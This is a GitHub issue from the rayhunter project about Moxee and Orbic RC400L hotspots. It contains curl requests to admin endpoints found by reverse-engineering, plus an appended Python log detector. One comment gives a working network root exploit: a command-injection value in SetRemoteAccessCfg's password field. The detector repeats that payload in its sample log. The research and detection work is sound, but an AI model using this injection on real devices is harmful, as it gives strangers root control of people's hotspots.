efforg/rayhunter#528

#528 support for Moxee Mobile Hotspot (and some braindump about orbic)

https://www.moxee.com/hotspot

I took a look at this device, and so did @oopsbagel independently. Here’s what we know:

  • it’s the same platform as the verizon orbic rc400l, the admin ui looks identical
  • the same endpoints exist
  • however, the serial command to enable ADB doesn’t do anything

I took a look at the orbic’s goahead binary with ghidra, to learn something about either the orbic or the moxee hotspot.

SetPortMode

this endpoint is available on both moxee and orbic. it looks like it is supposed to set usb composition, according to ghidra. you can find it by searching for SetPortMode in ghidra's strings table, in the goahead binary.

curl 'http://192.168.1.1/action/SetPortMode' -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate, br, zstd' \
  -H 'Referer: http://localhost:8080/common/home.html' \
  -H 'Content-Type: application/json' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://localhost:8080' \
  -H 'Connection: keep-alive' \
  -H 'Cookie: -goahead-session-=::webs.session::07d0a03f96c172c7e29a106affc946b1' \
  -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' \
  --data-raw '{"mode": "1"}'

returns {"retcode": 100} but I don't know why. I tried a few variants ("1" vs 1) but nothing changes.

SetRemoteAccessCfg

also available on both devices. it is supposed to launch telnet and/or sshd. it does not work:

curl 'http://192.168.1.1/action/SetRemoteAccessCfg' -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate, br, zstd' \
  -H 'Referer: http://localhost:8080/common/home.html' \
  -H 'Content-Type: application/json' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://localhost:8080' \
  -H 'Connection: keep-alive' \
  -H "Cookie: -goahead-session-=::webs.session::07d0a03f96c172c7e29a106affc946b1" \
  -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' \
  --data-raw '{"sshd": 1, "telnetd": 1}'

returns {"retcode": 0} (success) but nothing is launched.

Comments (2)

Root RCE over network for Orbic RC400L

(substitute session cookie)

curl 'http://192.168.1.1/action/SetRemoteAccessCfg' -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate, br, zstd' \
  -H 'Referer: http://localhost:8080/common/home.html' \
  -H 'Content-Type: application/json' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://localhost:8080' \
  -H 'Connection: keep-alive' \
  -H "Cookie: -goahead-session-=::webs.session::b575a7b39cecdb2871ed7da0aa660aea" \
  -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' \
  --data-raw '{"password": "\"; reboot; #"}'
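The comment above shows a string parameter of SetRemoteAccessCfg reaching a shell unquoted. As an added example that is not part of the issue or of rayhunter, here is a small detector that scans request-log lines for JSON string parameters to these endpoints carrying shell metacharacters; the "METHOD PATH BODY" log format and the sample lines are constructed for the example, so parse_line() must be adapted to whatever the device or a proxy actually logs.

```python
import json
import re
from typing import Any, Dict, Iterator, List, Optional, Tuple

# Constructed sample log in an assumed "METHOD PATH BODY" format (not a real
# goahead log). The third line carries the injected value from the comment.
SAMPLE_LOG = [
    'POST /action/SetPortMode {"mode": "1"}',
    'POST /action/SetRemoteAccessCfg {"sshd": 1, "telnetd": 1}',
    'POST /action/SetRemoteAccessCfg {"password": "\\"; reboot; #"}',
    'POST /action/SetRemoteAccessCfg {"password": "hunter2"}',
    'GET /common/home.html',
]

# Endpoints from the issue whose parameters are known or suspected to reach a shell.
WATCHED_PATHS = {"/action/SetRemoteAccessCfg", "/action/SetPortMode"}

# Characters that let a value escape its quoting in /bin/sh or chain commands.
SHELL_META = re.compile(r"[;&|`$<>\\\"'\n]")


def parse_line(line: str) -> Optional[Tuple[str, str, Any]]:
    """Split a log line into (method, path, decoded JSON body); None if unusable."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return None  # no request body to inspect
    try:
        return parts[0], parts[1], json.loads(parts[2])
    except json.JSONDecodeError:
        return None


def string_fields(obj: Any, prefix: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (dotted_key, value) for every string anywhere in a JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from string_fields(v, f"{prefix}{k}.")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from string_fields(v, f"{prefix}{i}.")
    elif isinstance(obj, str):
        yield prefix.rstrip("."), obj


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per string parameter that carries shell metacharacters."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[1] not in WATCHED_PATHS:
            continue
        _method, path, body = parsed
        for field, value in string_fields(body):
            hit = SHELL_META.search(value)
            if hit:  # record which character tripped the rule, for triage
                findings.append({"path": path, "field": field,
                                 "value": value, "char": hit.group(0)})
    return findings
```

Running scan(SAMPLE_LOG) flags only the password line; the legitimate SetPortMode and sshd/telnetd requests pass because their values carry no shell metacharacters.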